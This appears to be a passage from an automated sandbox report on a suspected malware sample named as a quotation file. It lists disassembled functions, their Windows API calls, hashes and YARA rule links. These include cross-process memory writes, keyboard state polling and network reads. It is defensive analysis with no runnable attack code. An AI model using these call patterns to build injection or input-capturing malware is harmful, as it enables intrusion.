Instruction Fuzzy Hash: 4841E435A04104AFEB24DF28CC98FE97FA5FB09354F154668F995AB2E0C371ED81DA80

Function 0049912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00499141
ScreenToClient.USER32(00000000,?), ref: 0049915E
GetAsyncKeyState.USER32(00000001), ref: 00499183
GetAsyncKeyState.USER32(00000002), ref: 0049919D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: fbddd83314cf492ce1b27618cf9a77268b62f612ec3ca92e328253fbbb48b71d
Instruction ID: 69eed3835951936abd54e53444cf406088ce0dffc0f322e60dfced2400816dc8
Opcode Fuzzy Hash: fbddd83314cf492ce1b27618cf9a77268b62f612ec3ca92e328253fbbb48b71d
Instruction Fuzzy Hash: D5416E31A0851ABBDF059F68C859BEEBB74FB05324F20832BE425A2390D7385D54DB95

Function 004F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004F38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 004F3922
TranslateMessage.USER32(?), ref: 004F394B
DispatchMessageW.USER32(?), ref: 004F3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004F3966

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: e93822a0be0272c829bee5a7000741c2cc81ad36ca7193b5a4c8b601d119bd46
Instruction ID: 2ca26a647b20925f3699e011096024c561fdfa75f66d71a0ecc105529642499f
Opcode Fuzzy Hash: e93822a0be0272c829bee5a7000741c2cc81ad36ca7193b5a4c8b601d119bd46
Instruction Fuzzy Hash: 5E31E7B050474A9EEB35CF209818FB73FE8EB11346F04055FD662822A0E3EC9689DB19

Function 004FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,004FC21E,00000000), ref: 004FCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 004FCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,004FC21E,00000000), ref: 004FCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,004FC21E,00000000), ref: 004FCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,004FC21E,00000000), ref: 004FCFF2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: c7f3d772fecf467eee04749d2ac7ea27a7b4c2837fbc11d4f77687a91978b401
Instruction ID: db69c4a11acf889c208fd33b655e9a6390cdc0d4549351bba6215796238af63f
Opcode Fuzzy Hash: c7f3d772fecf467eee04749d2ac7ea27a7b4c2837fbc11d4f77687a91978b401
Instruction Fuzzy Hash: 9F316D7150020DAFDB20DFA5C9C49BBBBF9EB14314B10842FF616D2280D739AE45DB64

Function 004E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004E1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 004E19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 004E19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 004E19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004E19E2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e6cf00b859d56661a92cd39eaabbbf2ac496436ed7bea5ec159c958d987ee3c8
Instruction ID: 653e6cc64924920175146a80e38d359aff2889b529eb8287c04a523f50f69a51
Opcode Fuzzy Hash: e6cf00b859d56661a92cd39eaabbbf2ac496436ed7bea5ec159c958d987ee3c8
Instruction Fuzzy Hash: 5E31D6B1940259EFCB00CFADCD99ADE3BB5EB14315F108226F921AB2E1C7749D44DB94

Function 00500930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00500951
GetForegroundWindow.USER32 ref: 00500968
GetDC.USER32(00000000), ref: 005009A4
GetPixel.GDI32(00000000,?,00000003), ref: 005009B0
ReleaseDC.USER32(00000000,00000003), ref: 005009E8

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 95a80fe294ef7caf19eefd1cfdd52dee8d93943dec62dfc6f7dcd4991d2cee16
Instruction ID: 4f3f367564eb0f90d7624010a589b87f2468181057522387894a408d44dce78d
Opcode Fuzzy Hash: 95a80fe294ef7caf19eefd1cfdd52dee8d93943dec62dfc6f7dcd4991d2cee16
Instruction Fuzzy Hash: D9218E75600204AFD704EF69D884EAEBBE9FF48744F04846DE94A973A2CB74EC04DB90

Function 00499639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00499693
SelectObject.GDI32(?,00000000), ref: 004996A2
BeginPath.GDI32(?), ref: 004996B9
SelectObject.GDI32(?,00000000), ref: 004996E2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2b6098f583740038c3b0e63891c94dcaf9aedb70424f86968a087a3e2819edc0
Instruction ID: e1f88cf263cced83ece02544204bff4864cadcdd3ad4e47b55a8712fe7fe389b
Opcode Fuzzy Hash: 2b6098f583740038c3b0e63891c94dcaf9aedb70424f86968a087a3e2819edc0
Instruction Fuzzy Hash: D5219070841705EBDF108F68EC287AE3FB8BB21316F10422BF411922A0D3795C59EB9C

Function 004E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?,?,004E035E), ref: 004E002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?), ref: 004E0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?), ref: 004E0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?), ref: 004E0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004DFF41,80070057,?,?), ref: 004E0070

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 5d22eb48d8d4d231e3e4a3c357c2d2a096d9912116b6f462eb2e0aac58564a9b
Instruction ID: 8ae245ec60f92f15b6e86dc8f76f9547c74540ea01a5b2c7d17aec3355cb7c42
Opcode Fuzzy Hash: 5d22eb48d8d4d231e3e4a3c357c2d2a096d9912116b6f462eb2e0aac58564a9b
Instruction Fuzzy Hash: AA01A272640204BFDB109F6AEC44BEA7EEDEF44752F148525F905D2210D7BADD849BA0

Function 004EE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 004EE997
QueryPerformanceFrequency.KERNEL32(?), ref: 004EE9A5
Sleep.KERNEL32(00000000), ref: 004EE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 004EE9B7
Sleep.KERNEL32 ref: 004EE9F3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 31d0dc2c7dd1f8ba1e967414b5a7f80e2b522e3c2e582f07ab97235166a14a60
Instruction ID: 2ea3a765e926e82b26ac84434b6bc28c69f1683b9fb8c7619f80699c0194bfb1
Opcode Fuzzy Hash: 31d0dc2c7dd1f8ba1e967414b5a7f80e2b522e3c2e582f07ab97235166a14a60
Instruction Fuzzy Hash: 28016171C41629DBCF00AFE6DD49AEDBBB8FF19301F004546D501B2241CB385555D769

Function 004E10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E114D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 05ee67bd6b8799c9df2128bc02f8a31877f6f4e616ff17d4cd23b44150a071f9
Instruction ID: 129299af8eaf02d5e484688af9bb391e2288778b622b8f6c37b7a74ed08319c7
Opcode Fuzzy Hash: 05ee67bd6b8799c9df2128bc02f8a31877f6f4e616ff17d4cd23b44150a071f9
Instruction Fuzzy Hash: 5A016D79580305BFDB115F65DC49EAB3F6EEF89361B104419FA41C3360DA72DC00DA60

Function 004E0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004E0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004E0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004E0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004E0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004E1002

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5736ba3058f25474286cbc108db9ab1c87c85c4518609fcb602139bf68d22544
Instruction ID: 3ea539f826249c100ddb85fb4ff39b3bceb2c6e278990d687eef7ba4cec3c433
Opcode Fuzzy Hash: 5736ba3058f25474286cbc108db9ab1c87c85c4518609fcb602139bf68d22544
Instruction Fuzzy Hash: FAF0AF39180301BBD7211FA59C4DF9B3F6EEF99762F118815F905C62A0CA31DC40DA60

Function 004E1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004E102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004E1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004E1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004E104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004E1062

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: dd751c59c5db05f70e53980532caa835f326f924f80183fda7086347195b2993
Instruction ID: eecd230ca3ec73f27eb731007e29cbb0248347c001ab09864fb931dd47bbf53d
Opcode Fuzzy Hash: dd751c59c5db05f70e53980532caa835f326f924f80183fda7086347195b2993
Instruction Fuzzy Hash: AAF0AF39180301BBD7211FA5EC48F9B3F6EEF99761F114815F905D6260CA31D840DA60

Function 004F030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F0324
CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F0331
CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F033E
CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F034B
CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F0358
CloseHandle.KERNEL32(?,?,?,?,004F017D,?,004F32FC,?,00000001,004C2592,?), ref: 004F0365

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a5a36f0329b3c9fa7e3d05568380ff2c9761d522733488cc9188a6a40ce0b201
Instruction ID: 280f1b70838b62bddf1a06de60469e87e9e55928fe9b10e29c663a31289fd9b8
Opcode Fuzzy Hash: a5a36f0329b3c9fa7e3d05568380ff2c9761d522733488cc9188a6a40ce0b201
Instruction Fuzzy Hash: AF019072800B199FC7309F66D880823FBF5BEA02153158A3FD69652A32C375A958DE84

Function 004E5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 004E5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 004E5C6F
MessageBeep.USER32(00000000), ref: 004E5C87
KillTimer.USER32(?,0000040A), ref: 004E5CA3
EndDialog.USER32(?,00000001), ref: 004E5CBD

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8b1438673d4979ba9cc0b9af8417130201467fa7bde8cc1fa926714ca0b01fac
Instruction ID: c943f23e942124dc2aece1a2863261ae7e07b3d8490520a8cfc7cfba45186533
Opcode Fuzzy Hash: 8b1438673d4979ba9cc0b9af8417130201467fa7bde8cc1fa926714ca0b01fac
Instruction Fuzzy Hash: DC01F930540B04ABFB205B15DD5EFE67BB8FF14B0AF00055AB183A10E1DBF5A989DB95

Function 004995C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004995D4
StrokeAndFillPath.GDI32(?,?,004D71F7,00000000,?,?,?), ref: 004995F0
SelectObject.GDI32(?,00000000), ref: 00499603
DeleteObject.GDI32 ref: 00499616
StrokePath.GDI32(?), ref: 00499631

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 924ad4348a8d7720dfd46dc88ddda039e48a1776049b3b59cda7e34fd94d1cb6
Instruction ID: 3ea1a395cfd7080092e3c37a51a647ac860cffaf3ab4d759d5a48c442526bad1
Opcode Fuzzy Hash: 924ad4348a8d7720dfd46dc88ddda039e48a1776049b3b59cda7e34fd94d1cb6
Instruction Fuzzy Hash: E4F06931085B08EBCB164F28EC2C7A93FB1AB20322F008228F465951F0C7358D99EF28

Function 004F581E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00483AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00483A97,?,?,00482E7F,?,?,?,00000000), ref: 00483AC2

CoInitialize.OLE32(00000000), ref: 004F5995
CoCreateInstance.OLE32(0051FCF8,00000000,00000001,0051FB68,?), ref: 004F59AE
CoUninitialize.OLE32 ref: 004F59CC

Strings

.lnk, xrefs: 004F5876, 004F58C1, 004F5985

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize
String ID: .lnk
API String ID: 3769357847-24824748
Opcode ID: d30e6ff975e17d0301abd2a6708903121ade90ee526714209d5a9df2a3d5b152
Instruction ID: d93f24cf75d825e2a17fcd9802b49950a93d484cdba37d38e53477bab83d9dc4
Opcode Fuzzy Hash: d30e6ff975e17d0301abd2a6708903121ade90ee526714209d5a9df2a3d5b152
Instruction Fuzzy Hash: 89D163706086059FC704EF25C480A2EBBE5FF89718F14885EFA899B361D739EC45CB96

Function 004EC5D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004EC6EE
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004EC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004EC7CA

Strings

0, xrefs: 004EC6AF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ItemMenu$Info$Default
String ID: 0
API String ID: 1306138088-4108050209
Opcode ID: 3c90c2734114be5564deed739837de852966e856b558d6a1a790da3558093a40
Instruction ID: 701a98830c79d5ec5e2cf000dcdb8118019458fb3eefbee8e71e6ba0976db28f
Opcode Fuzzy Hash: 3c90c2734114be5564deed739837de852966e856b558d6a1a790da3558093a40
Instruction Fuzzy Hash: 2851D3716043829BD7109F3AC8C5B6B7BE4AF45316F040A2FF995D3290D778DC068B5A

Function 004E2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004E21D0,?,?,00000034,00000800,?,00000034), ref: 004EB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004E2760

Part of subcall function 004EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004EB3F8

Part of subcall function 004EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004EB355
Part of subcall function 004EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004E2194,00000034,?,?,00001004,00000000,00000000), ref: 004EB365
Part of subcall function 004EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004E2194,00000034,?,?,00001004,00000000,00000000), ref: 004EB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004E27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004E281A

Strings

@, xrefs: 004E2832

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
